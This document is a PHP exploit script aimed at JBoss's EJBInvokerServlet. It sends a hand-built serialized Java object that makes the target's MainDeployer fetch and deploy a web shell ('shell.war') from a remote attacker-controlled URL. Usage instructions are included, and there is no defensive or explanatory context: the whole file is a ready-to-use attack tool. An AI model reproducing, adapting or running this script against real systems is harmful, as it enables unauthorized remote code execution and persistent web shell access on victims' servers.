<?php $target = @$argv[1]; $procotol = @$argv[2]; if ($argc < 2) { print "[-]:php Jboss.php https://targets:443 http/https "; exit(1); } $url="http://xx.xx.xx.xx/shell.war"; $url_len=pack("n",strlen($url)); function hex_dump($data, $newline=" ") { static $from = ''; static $to = ''; static $width = 16; static $pad = '.'; if ($from==='') { for ($i=0; $i<=0xFF; $i++) { $from .= chr($i); $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad; } } $hex = str_split(bin2hex($data), $width*2); $chars = str_split(strtr($data, $from, $to), $width); $offset = 0; foreach ($hex as $i => $line) { echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline; $offset += $width; } } $frag_i= "xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73". // ....sr.) org.jbos "x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72". // s.invoca tion.Mar "x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f". // shalledI nvocatio "x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77". // n...'A>. ....xppw "x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76". // .x..G..S .sr..jav "x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2". // a.lang.I nteger.. "xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75". // .....8.. .I..valu "x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e". // exr..jav a.lang.N "x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00". // umber... ........ "x78x70x26x95xbex0ax73x72x00x24x6fx72x67x2ex6ax62". // xp&...sr .$org.jb "x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d". // oss.invo cation.M "x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc". // arshalle dValue.. "xe0xd1xf4x4axd0x99x0cx00x00x78x70x77"; $frag_ii="x00"; $frag_iii= "xacxedx00x05x75x72x00x13x5bx4cx6ax61x76x61x2e". // .....ur. .[Ljava. "x6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90xcex58x9f". // lang.Obj ect;..X. "x10x73x29x6cx02x00x00x78x70x00x00x00x04x73x72x00". // .s)l...x p....sr. "x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6dx65x6e". // .javax.m anagemen "x74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03xa7x1b". // t.Object Name.... "xebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62x6fx73". // .m.....x pt.!jbos "x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69x63x65". // s.system :service "x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78x74x00". // =MainDep loyerxt. "x06x64x65x70x6cx6fx79x75x71x00x7ex00x00x00x00x00". // .deployu q.~..... "x01x74". $url_len. $url. "x75x72x00". "x13x5bx4cx6ax61x76x61x2ex6cx61". // ur..[ Ljava.la "x6ex67x2ex53x74x72x69x6ex67x3bxadxd2x56xe7xe9x1d". // ng.Strin g;..V... "x7bx47x02x00x00x78x70x00x00x00x01x74x00x10x6ax61". // {G...xp. ...t..ja "x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67"; $frag_iv= "x0dxd3". "xbexc9x78x77x04x00x00x00x01x73x72x00x22x6fx72x67". // ..xw.... .sr."org "x2ex6ax62x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6f". // .jboss.i nvocatio "x6ex2ex49x6ex76x6fx63x61x74x69x6fx6ex4bx65x79xb8". // n.Invoca tionKey. "xfbx72x84xd7x93x85xf9x02x00x01x49x00x07x6fx72x64". // .r...... ..I..ord "x69x6ex61x6cx78x70x00x00x00x05x73x71x00x7ex00x05". // inalxp.. ..sq.~.. "x77x0dx00x00x00x05xacxedx00x05x70xfbx57xa7xaax78". // w....... ..p.W..x "x77x04x00x00x00x03x73x71x00x7ex00x07x00x00x00x04". // w.....sq .~...... "x73x72x00x23x6fx72x67x2ex6ax62x6fx73x73x2ex69x6e". // sr.#org. jboss.in "x76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61x74". // vocation .Invocat "x69x6fx6ex54x79x70x65x59xa7x3ax1cxa5x2bx7cxbfx02". // ionTypeY .:..+|.. "x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00". // ..I..ord inalxp.. "x00x01x73x71x00x7ex00x07x00x00x00x0ax70x74x00x0f". // ..sq.~.. ....pt.. "x4ax4dx58x5fx4fx42x4ax45x43x54x5fx4ex41x4dx45x73". // JMX_OBJE CT_NAMEs "x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6d". // r..javax .managem "x65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03". // ent.Obje ctName.. "xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62". // ...m.... .xpt.!jb "x6fx73x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69". // oss.syst em:servi "x63x65x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78". // ce=MainD eployerx "x78"; // x $data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv; function vpost($url,$data){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($curl, CURLOPT_USERAGENT,'java'); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_AUTOREFERER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_TIMEOUT, 30); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $tmpInfo = curl_exec($curl); if (curl_errno($curl)) { echo "Curl https connect Error "; } curl_close($curl); return "Curl https connect suscess "; } function tpost($url,$data){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT,'java'); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_AUTOREFERER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_TIMEOUT, 30); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $Info = curl_exec($curl); if (curl_errno($curl)) { echo "Curl http connect Error "; } curl_close($curl); return "Curl http connect suscess "; } if($procotol == "https") { echo vpost($target."/invoker/EJBInvokerServlet/", $data); }else if ($procotol == "http") { echo tpost($target."/invoker/EJBInvokerServlet/", $data); }else { print "your not enter data "; exit(0); } ?>
Use: php jboss.php https://www.xx.com:443 http/https